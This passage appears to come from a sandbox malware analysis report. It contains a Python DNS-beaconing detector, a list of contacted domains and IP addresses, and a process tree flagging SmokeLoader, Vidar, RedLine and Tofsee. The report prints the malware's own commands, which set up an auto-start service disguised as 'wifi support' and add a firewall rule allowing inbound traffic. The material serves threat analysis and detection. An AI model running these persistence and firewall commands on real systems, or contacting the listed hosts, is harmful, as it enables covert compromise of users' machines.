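        if s["queries"] >= min_queries
        and s["median_gap"] is not None
        and s["median_gap"] <= max_median_gap
    )


def shared_infrastructure(rows):
    """Answer addresses that more than one queried name resolves to."""
    names_by_addr = defaultdict(set)
    for _, name, addr in rows:
        names_by_addr[addr].add(name)
    return {addr: sorted(names) for addr, names in names_by_addr.items() if len(names) > 1}


def abused_service_hits(stats):
    return sorted(name for name in stats if name in ABUSED_SERVICES)


if __name__ == "__main__":
    rows = parse_rows(DNS_ROWS)
    stats = query_stats(rows)
    for name in flag_beacons(stats):
        s = stats[name]
        print(f"beacon-like: {name} x{s['queries']}, median gap {s['median_gap']:.3f}s -> {s['addresses']}")
    for addr, names in shared_infrastructure(rows).items():
        print(f"shared address {addr}: {names}")
    print("abused services:", abused_service_hits(stats))
```

Deduplicating on timestamp matters: the sandbox emits one row per answer record, so a single query for cdn.discordapp.com shows up as five rows and would otherwise look like a burst. On the full table the same logic flags host-data-coin-11.com alone as beacon-like; the other names are resolved a handful of times each.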

HTTP Request Dependency Graph

• pieilmtu.com
  • host-data-coin-11.com
• nwilglig.org
• nfbqltka.com
• cvdhldsf.net
• qcjatd.com
• xrovmrlel.net
• cmgcwqatb.org
• owgvnnuoml.com
• data-host-coin-8.com
• opviax.net
• nunmqyect.net
• kyadmhioim.com
• rnsdjgkq.org
• sjgvu.com
• unicupload.top
• cqsurm.com
• gculkm.com
• ifvodd.net
• lvmiyiiy.com
• pegqugok.net
• uhiqru.org
• jbinuykf.net
• kybdaip.org
• 185.7.214.171:8080
• doynnfulb.net
• nxysak.org
• jxgxnkpb.org
• mfkcxcj.org
• codldamrms.net
• niaqngu.org
• hmpbvq.org
• ktpvhvj.com
• ovfkbfuk.org
• cgqgnij.net
• pdjtd.com
• jcppp.com
• fnkfxr.net
• crnelkeerw.net
• lyxrabhsyj.net
• dvrkmsgph.org
• bdwjscwkyb.org
• laegissbnw.net
• pmulpwtk.net
• vgfuhgdk.com
• gjmsrnrg.net
• hffekwpew.org
• nrofkgudk.org
• ldeax.net
• mvdnpk.org
• uaeudvuct.net
• tfmwuwhaf.org
• 81.163.30.181
• bjmmoxjkh.com
• uekxwe.org
• 74.201.28.62
• ybthjouy.net
• qycehx.net
• udwhex.net
• 185.163.204.22
• 185.163.204.24
• hriqvkh.com
• rajclxd.org
• rkgofw.com
• cmhrt.com
• rdctx.net
• hqdkqcs.com
• cfyeur.com
• lwqbhm.net
• podwtxiqj.com
• kxheih.com
• ahptoxawd.com
• ruiwhjpxrd.net
• ukonhqmwew.net
• qmeixpxj.org

Behavior

System Behavior

General

Start time: 20:28:28
Start date: 14/01/2022
Path: C:\Users\user\Desktop\ECD2MpEBSf.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ECD2MpEBSf.exe"
Imagebase: 0x400000
File size: 320512 bytes
MD5 hash: 31F0D01EE1FD6876668692791657D97E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 20:28:29
Start date: 14/01/2022
Path: C:\Users\user\Desktop\ECD2MpEBSf.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ECD2MpEBSf.exe"
Imagebase: 0x400000
File size: 320512 bytes
MD5 hash: 31F0D01EE1FD6876668692791657D97E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.721690876.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 20:28:36
Start date: 14/01/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmp, Author: Joe Security
Reputation: high

General

Start time: 20:28:37
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:28:55
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:29:10
Start date: 14/01/2022
Path: C:\Users\user\AppData\Roaming\jgdhbua
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\jgdhbua
Imagebase: 0x400000
File size: 320512 bytes
MD5 hash: 31F0D01EE1FD6876668692791657D97E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 20:29:10
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:29:11
Start date: 14/01/2022
Path: C:\Users\user\AppData\Roaming\jgdhbua
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\jgdhbua
Imagebase: 0x400000
File size: 320512 bytes
MD5 hash: 31F0D01EE1FD6876668692791657D97E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.776599972.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.776791205.00000000020A1000.00000004.00020000.sdmp, Author: Joe Security
Reputation: low

General

Start time: 20:29:12
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\BB8A.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\BB8A.exe
Imagebase: 0x400000
File size: 301056 bytes
MD5 hash: 277680BD3182EB0940BC356FF4712BEF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 46%, Metadefender
• Detection: 77%, ReversingLabs
Reputation: moderate

General

Start time: 20:29:15
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:29:16
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
Imagebase: 0x1010000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                            General

                                            Start time:20:29:17
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Local\Temp\CCB2.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\CCB2.exe
                                            Imagebase:0x400000
                                            File size:324608 bytes
                                            MD5 hash:043B44289E31BD54357F9A5C21833259
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low

                                            General

                                            Start time:20:29:17
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520
                                            Imagebase:0x1010000
                                            File size:434592 bytes
                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:20:29:21
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Local\Temp\D936.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\D936.exe
                                            Imagebase:0x400000
                                            File size:320512 bytes
                                            MD5 hash:9517CA2BC20EC061024C1209970CCD2E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.797091655.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000003.779473426.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low

                                            General

                                            Start time:20:29:23
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Imagebase:0xec0000
                                            File size:537088 bytes
                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 46%, Metadefender, Browse
                                            • Detection: 89%, ReversingLabs
                                            Reputation:moderate

                                            General

                                            Start time:20:29:25
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\
                                            Imagebase:0x11d0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:25
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:26
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\
                                            Imagebase:0x11d0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:26
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:27
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:27
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\sc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
                                            Imagebase:0xb40000
                                            File size:60928 bytes
                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:27
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:28
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\sc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection
                                            Imagebase:0xb40000
                                            File size:60928 bytes
                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:29
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:29
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\sc.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\sc.exe" start qeprvgom
                                            Imagebase:0xb40000
                                            File size:60928 bytes
                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:30
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:30
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe"
                                            Imagebase:0x400000
                                            File size:10624000 bytes
                                            MD5 hash:C8DE2E3F0DF5D9E1C126828B1444DBEA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.800731759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.801019606.00000000007C0000.00000004.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:20:29:30
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\netsh.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                            Imagebase:0x7ff77ba70000
                                            File size:82944 bytes
                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:31
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:20:29:32
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\svchost.exe
                                            Wow64 process (32bit):true
                                            Commandline:svchost.exe
                                            Imagebase:0x12f0000
                                            File size:44520 bytes
                                            MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000002.1024071704.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:20:29:35
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Imagebase:0x150000
                                            File size:537088 bytes
                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Disassembly

                                            Code Analysis